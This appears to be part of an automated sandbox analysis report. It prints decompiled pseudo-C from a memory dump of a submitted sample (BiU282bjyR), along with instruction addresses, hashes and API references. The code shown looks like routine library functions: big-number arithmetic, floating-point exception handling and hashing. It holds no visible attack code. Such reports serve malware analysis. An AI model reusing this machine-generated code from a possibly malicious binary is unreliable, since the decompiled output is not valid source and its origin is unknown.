                    														_t286 = _t334 + _v72 * _v44;
                    														asm("adc esi, edx");
                    														_t334 = _t355;
                    														_t355 = 0;
                    														__eflags = _t225 - _t286;
                    														if(_t225 < _t286) {
                    															_t334 = _t334 + 1;
                    															asm("adc esi, esi");
                    														}
                    														 *_t266 = _t225 - _t286;
                    														_t266 = _t266 + 4;
                    														_t219 = _v24 + 4;
                    														_t164 =  &_v16;
                    														 *_t164 = _v16 - 1;
                    														__eflags =  *_t164;
                    														_v24 = _t219;
                    													} while ( *_t164 != 0);
                    													_t263 = _v8;
                    													_t280 = _v60;
                    												}
                    												__eflags = 0 - _t355;
                    												if(__eflags <= 0) {
                    													if(__eflags < 0) {
                    														L63:
                    														__eflags = _t280;
                    														if(_t280 != 0) {
                    															_t338 = _t280;
                    															_t314 = _v20;
                    															_t362 =  &(_a8[1]);
                    															__eflags = _t362;
                    															_t265 = 0;
                    															do {
                    																_t282 =  *_t314;
                    																_t172 = _t362 + 4; // 0xa6a5959
                    																_t362 = _t172;
                    																_t314 = _t314 + 4;
                    																asm("adc eax, eax");
                    																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                    																asm("adc eax, 0x0");
                    																_t265 = 0;
                    																_t338 = _t338 - 1;
                    																__eflags = _t338;
                    															} while (_t338 != 0);
                    															_t263 = _v8;
                    														}
                    														_t263 = _t263 + 0xffffffff;
                    														asm("adc dword [ebp-0x18], 0xffffffff");
                    													} else {
                    														__eflags = _v52 - _t334;
                    														if(_v52 < _t334) {
                    															goto L63;
                    														}
                    													}
                    												}
                    												_t213 = _v12 - 1;
                    												__eflags = _t213;
                    												_v16 = _t213;
                    											} else {
                    												__eflags = _t263;
                    												if(_t263 != 0) {
                    													goto L54;
                    												}
                    											}
                    											_t331 = 0 + _t263;
                    											asm("adc esi, 0x0");
                    											_v20 = _v20 - 4;
                    											_t313 = _v32 - 1;
                    											_t262 = _a4;
                    											_t278 = _v80 - 4;
                    											_t206 = _v12 - 1;
                    											_v76 = _t331;
                    											_v32 = _t313;
                    											_v80 = _t278;
                    											_v12 = _t206;
                    											__eflags = _t313;
                    										} while (_t313 >= 0);
                    									}
                    									_t309 = _v16 + 1;
                    									_t204 = _t309;
                    									__eflags = _t204 -  *_t262;
                    									if(_t204 <  *_t262) {
                    										_t191 = _t204 + 1; // 0x454cd8
                    										_t274 =  &(_t262[_t191]);
                    										do {
                    											 *_t274 = 0;
                    											_t194 =  &(_t274[1]); // 0x91850fc2
                    											_t274 = _t194;
                    											_t204 = _t204 + 1;
                    											__eflags = _t204 -  *_t262;
                    										} while (_t204 <  *_t262);
                    									}
                    									 *_t262 = _t309;
                    									__eflags = _t309;
                    									if(_t309 != 0) {
                    										while(1) {
                    											_t271 =  *_t262;
                    											__eflags = _t262[_t271];
                    											if(_t262[_t271] != 0) {
                    												goto L78;
                    											}
                    											_t272 = _t271 + 0xffffffff;
                    											__eflags = _t272;
                    											 *_t262 = _t272;
                    											if(_t272 != 0) {
                    												continue;
                    											}
                    											goto L78;
                    										}
                    									}
                    									L78:
                    									return _t331;
                    								} else {
                    									goto L23;
                    								}
                    							}
                    						} else {
                    							_t6 =  &(_t328[1]); // 0xfc23b5a
                    							_t295 =  *_t6;
                    							_v44 = _t295;
                    							__eflags = _t295 - 1;
                    							if(_t295 != 1) {
                    								__eflags = _t349;
                    								if(_t349 != 0) {
                    									_t342 = 0;
                    									_v12 = 0;
                    									_v8 = 0;
                    									_v20 = 0;
                    									__eflags = _t349 - 0xffffffff;
                    									if(_t349 != 0xffffffff) {
                    										_t250 = _v16 + 1;
                    										__eflags = _t250;
                    										_v32 = _t250;
                    										_t373 =  &(_t262[_t349 + 1]);
                    										do {
                    											_t253 = E00456DD0( *_t373, _t342, _t295, 0);
                    											_v68 = _t303;
                    											_t373 = _t373 - 4;
                    											_v20 = _t262;
                    											_t342 = _t295;
                    											_t303 = 0 + _t253;
                    											asm("adc ecx, 0x0");
                    											_v12 = _t303;
                    											_t34 =  &_v32;
                    											 *_t34 = _v32 - 1;
                    											__eflags =  *_t34;
                    											_v8 = _v12;
                    											_t295 = _v44;
                    										} while ( *_t34 != 0);
                    										_t262 = _a4;
                    									}
                    									_v544 = 0;
                    									_t41 =  &(_t262[1]); // 0x4
                    									_t370 = _t41;
                    									 *_t262 = 0;
                    									E0044608E(_t370, 0x1cc,  &_v540, 0);
                    									_t247 = _v20;
                    									__eflags = 0 - _t247;
                    									 *_t370 = _t342;
                    									_t262[2] = _t247;
                    									asm("sbb ecx, ecx");
                    									__eflags =  ~0x00000000;
                    									 *_t262 = 0xbadbae;
                    									return _v12;
                    								} else {
                    									_t14 =  &(_t262[1]); // 0x4
                    									_t344 = _t14;
                    									_v544 = 0;
                    									 *_t262 = 0;
                    									E0044608E(_t344, 0x1cc,  &_v540, 0);
                    									_t256 = _t262[1];
                    									_t322 = _t256 % _v44;
                    									__eflags = 0 - _t322;
                    									 *_t344 = _t322;
                    									asm("sbb ecx, ecx");
                    									__eflags = 0;
                    									 *_t262 =  ~0x00000000;
                    									return _t256 / _v44;
                    								}
                    							} else {
                    								_t9 =  &(_t262[1]); // 0x4
                    								_v544 = _t198;
                    								 *_t262 = _t198;
                    								E0044608E(_t9, 0x1cc,  &_v540, _t198);
                    								__eflags = 0;
                    								return _t262[1];
                    							}
                    						}
                    					} else {
                    						__eflags = 0;
                    						return 0;
                    					}
                    				} else {
                    					return _t197;
                    				}
                    			}























































































                    0x00445bec
                    0x00445bef
                    0x00445bf3
                    0x00445bfd
                    0x00445c00
                    0x00445c02
                    0x00445c04
                    0x00445c11
                    0x00445c11
                    0x00445c14
                    0x00445c14
                    0x00445c17
                    0x00445c1a
                    0x00445c1c
                    0x00445d4f
                    0x00445d51
                    0x00445d9a
                    0x00445d9e
                    0x00445da4
                    0x00445d53
                    0x00445d55
                    0x00445d58
                    0x00445d5a
                    0x00445d5d
                    0x00445d5f
                    0x00445d61
                    0x00445d95
                    0x00445d95
                    0x00445d95
                    0x00445d63
                    0x00445d68
                    0x00445d6e
                    0x00445d6e
                    0x00445d71
                    0x00445d73
                    0x00445d75
                    0x00000000
                    0x00000000
                    0x00445d77
                    0x00445d78
                    0x00445d7b
                    0x00445d7e
                    0x00445d80
                    0x00000000
                    0x00445d82
                    0x00000000
                    0x00445d82
                    0x00000000
                    0x00445d80
                    0x00445d84
                    0x00445d8b
                    0x00445d8f
                    0x00445d93
                    0x00000000
                    0x00000000
                    0x00445d93
                    0x00445d96
                    0x00445d96
                    0x00445d98
                    0x00445da5
                    0x00445da8
                    0x00445dab
                    0x00445dae
                    0x00445dae
                    0x00445db2
                    0x00445db5
                    0x00445db8
                    0x00445dbb
                    0x00445dc6
                    0x00445dbd
                    0x00445dc2
                    0x00445dc2
                    0x00445dd0
                    0x00445dd5
                    0x00445dd8
                    0x00445dda
                    0x00445de4
                    0x00445de7
                    0x00445dee
                    0x00445df1
                    0x00445df4
                    0x00445dfc
                    0x00445e02
                    0x00445e02
                    0x00445e02
                    0x00445e02
                    0x00445df4
                    0x00445e07
                    0x00445e0e
                    0x00445e0e
                    0x00445e11
                    0x00445e14
                    0x00446046
                    0x00446046
                    0x00445e1a
                    0x00445e1a
                    0x00445e20
                    0x00445e23
                    0x00445e26
                    0x00445e29
                    0x00445e2c
                    0x00445e2f
                    0x00445e32
                    0x00445e32
                    0x00445e35
                    0x00445e3c
                    0x00445e3c
                    0x00445e37
                    0x00445e37
                    0x00445e37
                    0x00445e3e
                    0x00445e42
                    0x00445e45
                    0x00445e47
                    0x00445e4a
                    0x00445e51
                    0x00445e54
                    0x00445e57
                    0x00445e62
                    0x00445e65
                    0x00445e6a
                    0x00445e6f
                    0x00445e76
                    0x00445e7b
                    0x00445e7d
                    0x00445e7f
                    0x00445e83
                    0x00445e86
                    0x00445e89
                    0x00445e91
                    0x00445e9a
                    0x00445e9a
                    0x00445e9c
                    0x00445e9f
                    0x00445e9f
                    0x00445e89
                    0x00445ea9
                    0x00445eae
                    0x00445eb3
                    0x00445eb5
                    0x00445eb8
                    0x00445eba
                    0x00445ebd
                    0x00445ec0
                    0x00445ec2
                    0x00445ec5
                    0x00445ec8
                    0x00445eca
                    0x00445ed1
                    0x00445ed6
                    0x00445ed9
                    0x00445ee3
                    0x00445ee5
                    0x00445ee7
                    0x00445eea
                    0x00445eea
                    0x00445eec
                    0x00445eef
                    0x00445ef2
                    0x00445ef5
                    0x00445ef8
                    0x00445ecc
                    0x00445ecc
                    0x00445ecf
                    0x00000000
                    0x00000000
                    0x00445ecf
                    0x00445efb
                    0x00445efd
                    0x00445eff
                    0x00000000
                    0x00445f01
                    0x00445f01
                    0x00445f04
                    0x00445f06
                    0x00445f06
                    0x00445f14
                    0x00445f17
                    0x00445f1c
                    0x00445f1e
                    0x00000000
                    0x00000000
                    0x00445f20
                    0x00445f27
                    0x00445f27
                    0x00445f2a
                    0x00445f2d
                    0x00445f30
                    0x00445f33
                    0x00445f33
                    0x00445f36
                    0x00445f39
                    0x00445f3d
                    0x00445f40
                    0x00445f42
                    0x00445f45
                    0x00000000
                    0x00000000
                    0x00445f47
                    0x00445f45
                    0x00445f22
                    0x00445f22
                    0x00445f25
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00445f25
                    0x00445f4c
                    0x00445f4c
                    0x00000000
                    0x00445f4c
                    0x00445f49
                    0x00000000
                    0x00445f49
                    0x00445f04
                    0x00445eff
                    0x00445f4f
                    0x00445f4f
                    0x00445f51
                    0x00445f5b
                    0x00445f5b
                    0x00445f5e
                    0x00445f60
                    0x00445f62
                    0x00445f64
                    0x00445f69
                    0x00445f6c
                    0x00445f6c
                    0x00445f6f
                    0x00445f72
                    0x00445f75
                    0x00445f77
                    0x00445f8c
                    0x00445f8e
                    0x00445f90
                    0x00445f92
                    0x00445f94
                    0x00445f96
                    0x00445f98
                    0x00445f9a
                    0x00445f9d
                    0x00445f9d
                    0x00445fa1
                    0x00445fa3
                    0x00445fa9
                    0x00445fac
                    0x00445fac
                    0x00445fac
                    0x00445fb0
                    0x00445fb0
                    0x00445fb5
                    0x00445fb8
                    0x00445fb8
                    0x00445fbd
                    0x00445fbf
                    0x00445fc1
                    0x00445fc8
                    0x00445fc8
                    0x00445fca
                    0x00445fcf
                    0x00445fd1
                    0x00445fd4
                    0x00445fd4
                    0x00445fd7
                    0x00445fe0
                    0x00445fe0
                    0x00445fe2
                    0x00445fe2
                    0x00445fe7
                    0x00445fed
                    0x00445ff1
                    0x00445ff4
                    0x00445ff7
                    0x00445ff9
                    0x00445ff9
                    0x00445ff9
                    0x00445ffe
                    0x00445ffe
                    0x00446001
                    0x00446004
                    0x00445fc3
                    0x00445fc3
                    0x00445fc6
                    0x00000000
                    0x00000000
                    0x00445fc6
                    0x00445fc1
                    0x0044600b
                    0x0044600b
                    0x0044600c
                    0x00445f53
                    0x00445f53
                    0x00445f55
                    0x00000000
                    0x00000000
                    0x00445f55
                    0x0044601c
                    0x00446021
                    0x00446024
                    0x00446028
                    0x00446029
                    0x0044602c
                    0x0044602f
                    0x00446030
                    0x00446033
                    0x00446036
                    0x00446039
                    0x0044603c
                    0x0044603c
                    0x00446044
                    0x0044604b
                    0x0044604c
                    0x0044604e
                    0x00446050
                    0x00446052
                    0x00446055
                    0x00446060
                    0x00446060
                    0x00446066
                    0x00446066
                    0x00446069
                    0x0044606a
                    0x0044606a
                    0x00446060
                    0x0044606e
                    0x00446070
                    0x00446072
                    0x00446074
                    0x00446074
                    0x00446076
                    0x0044607a
                    0x00000000
                    0x00000000
                    0x0044607c
                    0x0044607c
                    0x0044607f
                    0x00446081
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00446081
                    0x00446074
                    0x00446083
                    0x0044608d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00445d98
                    0x00445c22
                    0x00445c22
                    0x00445c22
                    0x00445c25
                    0x00445c28
                    0x00445c2b
                    0x00445c5c
                    0x00445c5e
                    0x00445ca9
                    0x00445cab
                    0x00445cb2
                    0x00445cb9
                    0x00445cbc
                    0x00445cbf
                    0x00445cc5
                    0x00445cc5
                    0x00445cc6
                    0x00445cc9
                    0x00445cd0
                    0x00445cd9
                    0x00445cde
                    0x00445ce1
                    0x00445ce6
                    0x00445ce9
                    0x00445ceb
                    0x00445cf0
                    0x00445cf3
                    0x00445cf6
                    0x00445cf6
                    0x00445cf6
                    0x00445cfa
                    0x00445cfd
                    0x00445cfd
                    0x00445d02
                    0x00445d02
                    0x00445d0d
                    0x00445d18
                    0x00445d18
                    0x00445d1b
                    0x00445d27
                    0x00445d2c
                    0x00445d37
                    0x00445d39
                    0x00445d3b
                    0x00445d41
                    0x00445d46
                    0x00445d48
                    0x00445d4e
                    0x00445c60
                    0x00445c6c
                    0x00445c6c
                    0x00445c6f
                    0x00445c7f
                    0x00445c85
                    0x00445c8c
                    0x00445c8e
                    0x00445c96
                    0x00445c98
                    0x00445c9a
                    0x00445c9f
                    0x00445ca2
                    0x00445ca8
                    0x00445ca8
                    0x00445c2d
                    0x00445c30
                    0x00445c34
                    0x00445c3a
                    0x00445c49
                    0x00445c53
                    0x00445c5b
                    0x00445c5b
                    0x00445c2b
                    0x00445c06
                    0x00445c09
                    0x00445c0f
                    0x00445c0f
                    0x00445bf5
                    0x00445bfb
                    0x00445bfb

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0c9287357c0777f38d0ed98c25e46f6dd717687f56c963601e078637410ad711
                    • Instruction ID: 42395b61e422cea7ff917ae93a015c4e0162238b166848e3aeaec191eba6fdf9
                    • Opcode Fuzzy Hash: 0c9287357c0777f38d0ed98c25e46f6dd717687f56c963601e078637410ad711
                    • Instruction Fuzzy Hash: BF026D71E006199FEF14CFA9C8806AEB7F1EF89314F25826AD819E7341D734AE05CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00452D3B(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                    				signed int _t172;
                    				signed int _t175;
                    				signed int _t178;
                    				signed int* _t179;
                    				signed int _t195;
                    				signed int _t199;
                    				signed int _t202;
                    				void* _t203;
                    				void* _t206;
                    				signed int _t209;
                    				void* _t210;
                    				signed int _t225;
                    				unsigned int* _t240;
                    				signed char _t242;
                    				signed int* _t250;
                    				unsigned int* _t256;
                    				signed int* _t257;
                    				signed char _t259;
                    				long _t262;
                    				signed int* _t265;
                    
                    				 *(_a4 + 4) = 0;
                    				_t262 = 0xc000000d;
                    				 *(_a4 + 8) = 0;
                    				 *(_a4 + 0xc) = 0;
                    				_t242 = _a12;
                    				if((_t242 & 0x00000010) != 0) {
                    					_t262 = 0xc000008f;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                    				}
                    				if((_t242 & 0x00000002) != 0) {
                    					_t262 = 0xc0000093;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                    				}
                    				if((_t242 & 0x00000001) != 0) {
                    					_t262 = 0xc0000091;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                    				}
                    				if((_t242 & 0x00000004) != 0) {
                    					_t262 = 0xc000008e;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                    				}
                    				if((_t242 & 0x00000008) != 0) {
                    					_t262 = 0xc0000090;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                    				}
                    				_t265 = _a8;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                    				_t259 = E0045336E(_a4);
                    				if((_t259 & 0x00000001) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                    				}
                    				if((_t259 & 0x00000004) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                    				}
                    				if((_t259 & 0x00000008) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                    				}
                    				if((_t259 & 0x00000010) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                    				}
                    				if((_t259 & 0x00000020) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                    				}
                    				_t172 =  *_t265 & 0x00000c00;
                    				if(_t172 == 0) {
                    					 *_a4 =  *_a4 & 0xfffffffc;
                    				} else {
                    					if(_t172 == 0x400) {
                    						_t257 = _a4;
                    						_t225 =  *_t257 & 0xfffffffd | 1;
                    						L26:
                    						 *_t257 = _t225;
                    						L29:
                    						_t175 =  *_t265 & 0x00000300;
                    						if(_t175 == 0) {
                    							_t250 = _a4;
                    							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                    							L35:
                    							 *_t250 = _t178;
                    							L36:
                    							_t179 = _a4;
                    							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                    							if(_a28 == 0) {
                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                    								 *((long long*)(_a4 + 0x10)) =  *_a20;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                    								_t254 = _a4;
                    								_t240 = _a24;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                    								 *(_a4 + 0x50) =  *_t240;
                    							} else {
                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                    								_t240 = _a24;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                    								 *(_a4 + 0x50) =  *_t240;
                    							}
                    							E004532D4(_t254);
                    							RaiseException(_t262, 0, 1,  &_a4);
                    							_t256 = _a4;
                    							if((_t256[2] & 0x00000010) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffffe;
                    							}
                    							if((_t256[2] & 0x00000008) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffffb;
                    							}
                    							if((_t256[2] & 0x00000004) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffff7;
                    							}
                    							if((_t256[2] & 0x00000002) != 0) {
                    								 *_t265 =  *_t265 & 0xffffffef;
                    							}
                    							if((_t256[2] & 0x00000001) != 0) {
                    								 *_t265 =  *_t265 & 0xffffffdf;
                    							}
                    							_t195 =  *_t256 & 0x00000003;
                    							if(_t195 == 0) {
                    								 *_t265 =  *_t265 & 0xfffff3ff;
                    							} else {
                    								_t206 = _t195 - 1;
                    								if(_t206 == 0) {
                    									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                    									L55:
                    									 *_t265 = _t209;
                    									L58:
                    									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                    									if(_t199 == 0) {
                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                    										L64:
                    										 *_t265 = _t202;
                    										L65:
                    										if(_a28 == 0) {
                    											 *_t240 = _t256[0x14];
                    										} else {
                    											 *_t240 = _t256[0x14];
                    										}
                    										return _t202;
                    									}
                    									_t203 = _t199 - 1;
                    									if(_t203 == 0) {
                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                    										goto L64;
                    									}
                    									_t202 = _t203 - 1;
                    									if(_t202 == 0) {
                    										 *_t265 =  *_t265 & 0xfffff3ff;
                    									}
                    									goto L65;
                    								}
                    								_t210 = _t206 - 1;
                    								if(_t210 == 0) {
                    									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                    									goto L55;
                    								}
                    								if(_t210 == 1) {
                    									 *_t265 =  *_t265 | 0x00000c00;
                    								}
                    							}
                    							goto L58;
                    						}
                    						if(_t175 == 0x200) {
                    							_t250 = _a4;
                    							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                    							goto L35;
                    						}
                    						if(_t175 == 0x300) {
                    							 *_a4 =  *_a4 & 0xffffffe3;
                    						}
                    						goto L36;
                    					}
                    					if(_t172 == 0x800) {
                    						_t257 = _a4;
                    						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                    						goto L26;
                    					}
                    					if(_t172 == 0xc00) {
                    						 *_a4 =  *_a4 | 0x00000003;
                    					}
                    				}
                    			}























                    0x00452d49
                    0x00452d50
                    0x00452d55
                    0x00452d5b
                    0x00452d5e
                    0x00452d64
                    0x00452d69
                    0x00452d6e
                    0x00452d6e
                    0x00452d74
                    0x00452d79
                    0x00452d7e
                    0x00452d7e
                    0x00452d85
                    0x00452d8a
                    0x00452d8f
                    0x00452d8f
                    0x00452d96
                    0x00452d9b
                    0x00452da0
                    0x00452da0
                    0x00452da7
                    0x00452dac
                    0x00452db1
                    0x00452db1
                    0x00452db9
                    0x00452dc9
                    0x00452ddb
                    0x00452ded
                    0x00452e00
                    0x00452e12
                    0x00452e1a
                    0x00452e1f
                    0x00452e24
                    0x00452e24
                    0x00452e2b
                    0x00452e30
                    0x00452e30
                    0x00452e37
                    0x00452e3c
                    0x00452e3c
                    0x00452e43
                    0x00452e48
                    0x00452e48
                    0x00452e4f
                    0x00452e54
                    0x00452e54
                    0x00452e5e
                    0x00452e60
                    0x00452e9a
                    0x00452e62
                    0x00452e67
                    0x00452e8b
                    0x00452e93
                    0x00452e87
                    0x00452e87
                    0x00452e9d
                    0x00452ea4
                    0x00452ea6
                    0x00452ec8
                    0x00452ed0
                    0x00452ed3
                    0x00452ed3
                    0x00452ed5
                    0x00452ed5
                    0x00452ee0
                    0x00452ee6
                    0x00452eeb
                    0x00452ef2
                    0x00452f2c
                    0x00452f37
                    0x00452f3d
                    0x00452f40
                    0x00452f43
                    0x00452f4f
                    0x00452f57
                    0x00452ef4
                    0x00452ef7
                    0x00452f03
                    0x00452f09
                    0x00452f0f
                    0x00452f12
                    0x00452f1b
                    0x00452f1b
                    0x00452f5a
                    0x00452f68
                    0x00452f6e
                    0x00452f75
                    0x00452f77
                    0x00452f77
                    0x00452f7e
                    0x00452f80
                    0x00452f80
                    0x00452f87
                    0x00452f89
                    0x00452f89
                    0x00452f90
                    0x00452f92
                    0x00452f92
                    0x00452f99
                    0x00452f9b
                    0x00452f9b
                    0x00452fa8
                    0x00452fab
                    0x00452fe2
                    0x00452fad
                    0x00452fad
                    0x00452fb0
                    0x00452fdb
                    0x00452fd0
                    0x00452fd0
                    0x00452fe4
                    0x00452fec
                    0x00452fef
                    0x0045300e
                    0x00453013
                    0x00453013
                    0x00453015
                    0x0045301a
                    0x00453026
                    0x0045301c
                    0x0045301f
                    0x0045301f
                    0x0045302b
                    0x0045302b
                    0x00452ff1
                    0x00452ff4
                    0x00453003
                    0x00000000
                    0x00453003
                    0x00452ff6
                    0x00452ff9
                    0x00452ffb
                    0x00452ffb
                    0x00000000
                    0x00452ff9
                    0x00452fb2
                    0x00452fb5
                    0x00452fcb
                    0x00000000
                    0x00452fcb
                    0x00452fba
                    0x00452fbc
                    0x00452fbc
                    0x00452fba
                    0x00000000
                    0x00452fab
                    0x00452ead
                    0x00452ebb
                    0x00452ec3
                    0x00000000
                    0x00452ec3
                    0x00452eb1
                    0x00452eb6
                    0x00452eb6
                    0x00000000
                    0x00452eb1
                    0x00452e6e
                    0x00452e7c
                    0x00452e84
                    0x00000000
                    0x00452e84
                    0x00452e72
                    0x00452e77
                    0x00452e77
                    0x00452e72

                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00452D36,?,?,00000008,?,?,00455BED,00000000), ref: 00452F68
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: d07e5f888e39d313e61fc9618f59c4e8dd55f143eba3426c2705e6c45139c68f
                    • Instruction ID: bfd5d5b17e3b1446349ec770577352c967424e0bbe5108b71cbdfaa7dbefb4ce
                    • Opcode Fuzzy Hash: d07e5f888e39d313e61fc9618f59c4e8dd55f143eba3426c2705e6c45139c68f
                    • Instruction Fuzzy Hash: 75B17E321106089FD719CF28C58AB657BE0FF05366F25865AEC99CF3A2C379D986CB44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00433364(void* __ecx, void* __edx) {
                    				signed int _t202;
                    				signed int _t203;
                    				signed int _t204;
                    				signed int _t205;
                    				signed int _t209;
                    				signed int _t210;
                    				signed int _t211;
                    				signed int _t213;
                    				signed int _t214;
                    				signed int _t215;
                    				signed int _t218;
                    				signed int _t219;
                    				signed int _t220;
                    				signed int _t222;
                    				signed int _t223;
                    				signed int _t224;
                    				signed int _t227;
                    				signed int _t228;
                    				signed int _t229;
                    				signed int _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t245;
                    				signed int _t246;
                    				signed int _t247;
                    				signed int _t250;
                    				signed int _t251;
                    				signed int _t252;
                    				signed int _t256;
                    				signed int _t257;
                    				signed int _t258;
                    				signed int _t261;
                    				signed int _t262;
                    				signed int _t263;
                    				signed int _t267;
                    				signed int _t268;
                    				signed int _t269;
                    				signed int _t272;
                    				signed int _t273;
                    				signed int _t274;
                    				signed int _t278;
                    				signed int _t279;
                    				signed int _t280;
                    				signed int _t283;
                    				signed int _t284;
                    				signed int _t285;
                    				signed int _t290;
                    				unsigned int _t294;
                    				void* _t296;
                    				signed int _t298;
                    				void* _t395;
                    				void* _t396;
                    				void* _t397;
                    				void* _t398;
                    				void* _t399;
                    				void* _t400;
                    				void* _t401;
                    				void* _t402;
                    				void* _t403;
                    				void* _t404;
                    				void* _t406;
                    				void* _t407;
                    				void* _t408;
                    				void* _t409;
                    				void* _t410;
                    				void* _t417;
                    				void* _t418;
                    				void* _t419;
                    				void* _t420;
                    				void* _t421;
                    				void* _t428;
                    				void* _t429;
                    				void* _t430;
                    				void* _t431;
                    				void* _t432;
                    				void* _t439;
                    				void* _t440;
                    				void* _t441;
                    				void* _t442;
                    				void* _t443;
                    				signed int _t449;
                    				void* _t450;
                    				void* _t451;
                    				void* _t452;
                    				void* _t453;
                    				void* _t454;
                    				signed int _t460;
                    				void* _t461;
                    				void* _t462;
                    				void* _t463;
                    				void* _t464;
                    				void* _t465;
                    				signed int _t471;
                    				void* _t472;
                    				void* _t473;
                    				void* _t474;
                    				void* _t475;
                    				void* _t476;
                    				signed int _t482;
                    				void* _t501;
                    				void* _t508;
                    				void* _t515;
                    				void* _t522;
                    				void* _t529;
                    				void* _t536;
                    				void* _t543;
                    				void* _t550;
                    				unsigned int _t553;
                    				signed int _t558;
                    				signed int _t563;
                    				signed int _t568;
                    				signed int _t573;
                    				signed int _t578;
                    				signed int _t583;
                    				signed int _t588;
                    				signed int _t593;
                    				unsigned int* _t599;
                    				signed int _t600;
                    				void* _t601;
                    				void* _t602;
                    				void* _t603;
                    
                    				_t395 = __edx;
                    				 *((intOrPtr*)(_t601 + 0x30)) = 0x30;
                    				_t298 = 8;
                    				 *((intOrPtr*)(_t601 + 0x14)) = __ecx;
                    				memcpy(_t601 + 0x34, __ecx, _t298 << 2);
                    				_t602 = _t601 + 0xc;
                    				_push(0x10);
                    				memcpy(_t602 + 0x54, _t395, 0 << 2);
                    				_t603 = _t602 + 0xc;
                    				_t599 = _t603 + 0x8c;
                    				do {
                    					_t553 =  *_t599;
                    					_t294 =  *(_t599 - 0x34);
                    					_t396 = 0x13;
                    					_t202 = E0043329A(_t553, _t396);
                    					_t397 = 0x11;
                    					_t203 = E0043329A(_t553, _t397);
                    					_t398 = 0x12;
                    					_t204 = E0043329A(_t294, _t398);
                    					_t399 = 7;
                    					_t205 = E0043329A(_t294, _t399);
                    					_t599 =  &(_t599[1]);
                    					_t12 = _t603 + 0x30;
                    					 *_t12 =  *(_t603 + 0x30) - 1;
